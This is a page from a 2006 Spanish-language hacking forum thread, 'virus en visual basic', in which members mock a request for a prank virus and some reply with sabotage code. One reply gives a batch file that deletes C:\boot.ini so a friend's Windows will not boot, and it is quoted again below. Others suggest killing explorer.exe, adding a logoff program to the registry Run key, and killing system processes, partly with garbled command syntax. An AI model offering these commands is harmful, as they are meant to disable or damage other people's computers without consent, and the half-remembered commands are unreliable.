elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  virus en visual basic
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 Ir Abajo Respuesta Imprimir
Autor Tema: virus en visual basic  (Leído 8,451 veces)
Robokop


Desconectado Desconectado

Mensajes: 1.660



Ver Perfil
Re: virus en visual basic
« Respuesta #20 en: 16 Marzo 2006, 04:29 am »

kuak.. no se pelen ...
en realidad... son todos lammers.. xq mi hermano sigue vivo xD
jaja na mentira chikos... son todos unas masa.. aguante este foro.... me esta ayudando una bocha...
y no se peleen ok ?
Eske debe de esta en un ejecutable y correr bajo winxp con sp2 si no, no funciona XD (Esta bien pues ya no voy a bromear se que mis chistes son malos...  :-()


En línea

Chief

Desconectado Desconectado

Mensajes: 232


Ind. Arg.


Ver Perfil
Re: virus en visual basic
« Respuesta #21 en: 16 Marzo 2006, 07:18 am »

o_O, que post de *****. asi de facil, no se como existe.


En línea

sr. oscuro

hackpsycho


Desconectado Desconectado

Mensajes: 391



Ver Perfil
Re: virus en visual basic
« Respuesta #22 en: 16 Marzo 2006, 16:58 pm »

aajajaj, borren el post, la verdad, pongase a buscar programacion de verdad,
En línea


ranslsad


Desconectado Desconectado

Mensajes: 492


Dim Ranslsad as String * :P - Que Vicio!


Ver Perfil WWW
Re: virus en visual basic
« Respuesta #23 en: 29 Marzo 2006, 14:33 pm »

Lo que podrian hacer es poner que el programa se inicie con windows y al iniciarse el programa se termina el proceso Windows y asi no sale nada, solo se ve la imagen de fondo... no creen? pero eso de dejar k no se inicie windows creo que no se puede...

Salu2

Ranslsad
En línea

The Shredder

Desconectado Desconectado

Mensajes: 251


La guitarra,causa y solucion a todos mis problemas


Ver Perfil WWW
Re: virus en visual basic
« Respuesta #24 en: 29 Marzo 2006, 22:38 pm »

shell "cmd.exe /c taskkill /f /im explorer.exe" .......
 :rolleyes: eso??
En línea

pure linux programming...
SpRiTeR

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: virus en visual basic
« Respuesta #25 en: 2 Abril 2006, 03:16 am »

xDD Dios mio que Lammers.. (Los que pidieron un virus para derretir el micro xDD)
En línea

[VolkS]

Desconectado Desconectado

Mensajes: 288


[Argentina]


Ver Perfil
Re: virus en visual basic
« Respuesta #26 en: 5 Abril 2006, 13:14 pm »

Nadie sabe lo que es ironia o humor , e sobvio que fue un chiste lo del micro y lo de derretir el CD, dios no pueden no enter.....
En línea

Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: virus en visual basic
« Respuesta #27 en: 5 Abril 2006, 16:00 pm »

Me estoy cansando de sus bromitas y de que no hay un moderador por aki...
Vale que sea un lammer, pero de ahi a decir chorradas...
Chab@l@ aui tienes tu virus:
Código:
@echo off
DEL C:\boot.ini
EXIT

Esta en bach, abres el block de notas y lo guardas por ejemolo con el nombre de "loko.bat"

Cuando lo abra borrara el archivo que usa windows para saber como tiene que arrancar, si tu amigo es un inutil con eso vale.

Salu2
En línea

[D4N93R]
Wiki

Desconectado Desconectado

Mensajes: 1.646


My software never has bugs. Its just features!


Ver Perfil WWW
Re: virus en visual basic
« Respuesta #28 en: 6 Abril 2006, 03:05 am »

Wow... jajajaj 

@echo off
DEL C:\boot.ini
EXIT
   
capaz q ni entiende eso... mejor cierren el post o mejor aun.. borrenlo.... 

PD yo quiero un programa que me haga la tarea....
En línea

THOR8608

Desconectado Desconectado

Mensajes: 1



Ver Perfil
Re: virus en visual basic
« Respuesta #29 en: 7 Abril 2006, 00:12 am »

Mira hay bastantes formas de hacer que se cuelgue windows en su inicio la manera mas sencilla y con dos lineas de codigo, primero el caso sencillo qu consiste en tener acceso fisico a la maquina y es colgar la siguiente clave en elregistro de windows HKEY_CURRENT_USER/SOFTWARE/MICROSOFT/WINDOWS/CURRENTVERSION/RUN/logooff.exe así de simple, para qu todos los usuarios tengan el mismo efecto debes colgarla como administrador.
prueba con esta sino tiene acceso fisico puede hacer un fichero .exe en c++ en donde se utiliza la funcíon system("CUALQUIER COMANDO DE CONSOLA"), dentro de este campo de comandos de consola hay varios que sirven para subir claves en el registro y sugiero que los estudie en la sección de sistemas operativos hay un post bastante interesante, la mejor utilidad es cargar un comando que se llama KILLTASK /F /M svchots.exe, intentalo y te aparecera un interesante mensaje de apagado del equipo en determinado tiempo, es facil ayudar a la gente no!!!
PD: Sugieroque revise la sintasix del os comandos que he proporcionado, es que los colgue de pura memoria.
En línea

LA SUERTE FAVORECE LAS MENTES PREPARADAS
Páginas: 1 2 [3] 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ocultar virus con Visual Basic para que no lo detecte firewall
Programación Visual Basic
Davidsaiz 5 4,033 Último mensaje 27 Mayo 2017, 10:44 am
por Davidsaiz
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines